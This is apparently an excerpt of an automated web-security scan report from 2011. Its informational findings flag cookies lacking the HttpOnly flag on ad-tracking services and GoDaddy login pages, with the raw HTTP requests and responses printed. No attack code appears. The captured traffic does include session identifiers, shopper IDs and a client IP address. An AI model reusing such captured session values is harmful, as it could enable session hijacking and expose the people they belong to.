Content-Length: 405795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">

...[SNIP]...

11.18. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=2&gen=1000&gen=100&sid=4e6264ca66bc96d7&callback=_ate.ad.hrr&pub=xa-4c99effd765dd67e&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1lovjpa HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Set-Cookie: di=1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:22 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03-Oct-2011 17:32:22 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Sat, 03 Sep 2011 17:32:21 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"OTUxMDFOQVVTQ0EyMTczMDU4MDgwNzc0MDAwVg=="});

11.19. http://cf.addthis.com/red/usync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/usync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/usync?pid=6&puid=6422714091563403120 HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; uid=4e5e3f1ae3fd7427; uvc=22|35; psc=0; dt=X; di=%7B%7D..1315071141.10R|1315071225.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: di=%7B%226%22%3A%226422714091563403120%22%7D..1315071277.1WV|1315071141.10R|1315071141.1FE|1315071141.60|1315071141.1EY|1314983342.1OD; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:34:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Content-Type: image/png
Content-Length: 67
Date: Sat, 03 Sep 2011 17:34:55 GMT
Connection: close

.PNG
.
...IHDR.............:~.U...
IDATx.c`......H..q....IEND.B`.

11.20. http://community.research.microsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.research.microsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: community.research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
CommunityServer: 4.1.31106.3070
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 03 Sep 2011 08:26:47 GMT; expires=Sun, 02-Sep-2012 13:26:47 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: CSAnonymous=7ae6ffeb-cdb2-483f-8991-07caf2fbdb8f; expires=Sat, 03-Sep-2011 13:46:47 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:26:47 GMT
Connection: close
Content-Length: 28641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

11.21. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt10; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: vstcnt=41bb010r063d7x118e10124zbs2150v10024fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: clid=2lqt1dm01170vf1kj11kp2en05i0c00d6u02100d908; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: sglst=41bb00v00t044m9w00arr9w00dnh9u303td9w00arp9u30f7u9u307219w000kn9w00a6p9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: rdrlst=41c0sh6lqupib000000086u021d6blqupib000000086u021byalqtqj10000000b6u02120zlqupib000000086u0213kulqupib000000086u0216pilqwj0f000000046u020x18lqupib000000086u0218k8lqupib000000086u0216pelqtqj10000000b6u0218ldlqwnn2000000036u0218lclqupib000000086u0218erlqtqj10000000b6u02163mlqupib000000086u0218etlqwj0f000000046u0209pglqupib000000086u021679lqupib000000086u020dhvlqupib000000086u020dhxlqwj0f000000046u0218lplqupib000000086u0214kelqtqj10000000b6u0218lqlqwj06000000056u0214khlqwj0f000000046u0214hnlqwj0f000000046u0218l0lqtqsb000000096u020lm0lqupib000000086u020lw4lqwj0f000000046u0217fllqupib000000086u0217gxlqtqj10000000b6u0218kzlqwj02000000066u020lm4lqupib000000086u020llslqupib000000086u020zpelqwj0f000000046u021192lqyjdy000000026u020zpclqtqj10000000b6u0219ezlqtqj10000000b6u0218knlqw8s9000000076u0206pblqupib000000086u0218kmlqtqjn0000000a6u020afolqupib000000086u0207sylqupib000000086u020kkjlqupib000000086u020drhlqupib000000086u0210telqyjdy000000016u0114bxlqwj0f000000046u0214bulqtqj10000000b6u021cyqlqtqj10000000b6u020huxlqtqj10000000b6u0216d5lqwj0f000000046u02; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Location: http://cm.g.doubleclick.net/pixel?nid=media6degrees
Content-Length: 0
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close


11.22. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6?pv=41622699308.20912&cookie=&keyw=ssl+certificates HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:30:27 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6/3NUTGTWFSRFIPAWBFDEMYM.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


11.23. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=809&g=20&a=3&s=1&t=i HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=SEO000000000W&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_loc=http%3A//www.register.com/
Cookie: FFgeo=5386156; ZFFBbh=955B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|633_962#381Z695_955#374Z332_950#369; FFAbh=950B809,20|10_1#365:305,20|458_1#371Z145_2#371; FFBbh=962B305,20|145_2#3Z458_1#0:809,20|10_1#0; ZEDOIDX=5

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: FFAbh=950B809,20|3_2#392Z10_1#365:305,20|458_1#371Z145_2#371;expires=Fri, 02 Dec 2011 21:56:38 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=962B809,20|3_2#30Z10_1#0:305,20|145_2#3Z458_1#0;expires=Sun, 02 Sep 2012 21:56:38 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=14707
Expires: Sun, 04 Sep 2011 02:01:45 GMT
Date: Sat, 03 Sep 2011 21:56:38 GMT
Connection: close

GIF89a.............!.......,...........D..;



11.24. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=121&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 90
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:25 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=977B826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:25 GMT;domain=.zedo.com;path=/;
ETag: "3a9d58c-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=24701
Expires: Sun, 04 Sep 2011 04:32:06 GMT
Date: Sat, 03 Sep 2011 21:40:25 GMT
Connection: close

GIF89a.............!.......,...........D..;


GIF89a.............!.......,...........D..;

11.25. http://ds.addthis.com/red/psi/sites/vasco.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/vasco.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/vasco.com/p.json?callback=_ate.ad.hpr&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1wh4476 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=1

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:22 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:22 GMT; Path=/
Set-Cookie: di=%7B%7D..1315071141.10R|1315071142.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

11.26. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=46b8b784-19e0-4400-8cdb-f6284ddc3d9a HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=ef156cf5-d9a2-4704-9dc3-362f08c1bcb4; sgm=12290=734380

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=12290=734380&7435=734382; domain=.interclick.com; expires=Fri, 03-Sep-2021 21:34:02 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 03 Sep 2011 21:34:02 GMT

GIF89a.............!.......,...........D..;

11.27. https://idp.godaddy.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idp.godaddy.com
Path:   /login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=true&myaurl=%2fdefault.aspx HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=; ShopperId1=miaasiuadhnegiagkeyasfgdujffpbkb

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:30:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://mya.godaddy.com/login_redirect.aspx?idpinfo=none&SPKey=GDMYA-M1PWMYAWEB006&myaurl=%2fdefault.aspx
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 230

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://mya.godaddy.com/login_redirect.aspx?idpinfo=none&amp;SPKey=GDMYA-M1PWMYAWEB006&amp;myaurl=%2fdefault.aspx">he
...[SNIP]...

11.28. https://idp.godaddy.com/retrieveaccount.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idp.godaddy.com
Path:   /retrieveaccount.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB101 HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB101&target=http%3A%2F%2Fwww.godaddy.com%2Faffiliates%2Faffiliate-program.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:27:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
